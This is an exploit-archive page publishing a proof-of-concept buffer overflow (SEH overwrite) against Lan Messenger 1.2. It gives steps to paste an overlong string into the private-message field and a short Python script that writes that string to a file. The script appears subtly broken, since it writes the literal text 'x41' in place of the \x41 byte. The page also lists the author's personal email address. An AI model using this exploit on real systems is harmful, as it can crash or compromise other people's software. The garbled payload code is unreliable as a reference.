[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Lan Messenger sending PM Buffer Overflow(UNICODE) - Overwrite SEH
# Published : 2013-05-11
# Author :
# Previous Title : MiniWeb MiniWeb HTTP Server (build 300) - Crash PoC
# Next Title : Flightgear 2.0, 2.4 - Remote Format String Exploit


# Exploit Title: Lan Messenger Version 1.2 Buffer Overflow vulnerability - UNICODE(POC)
# Date: 09-05-2013
# Exploit Author: ariarat 
# Vendor Homepage: http://lmadhavan.com
# Software Link: http://lmadhavan.com/software/archive/lanmsg12.zip
# Version: 1.2 & may be old versions!
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in Public Chat's send PM section or in any window for sending PM to others. 
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

filename="string.txt"
buffer = "x41" * 2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()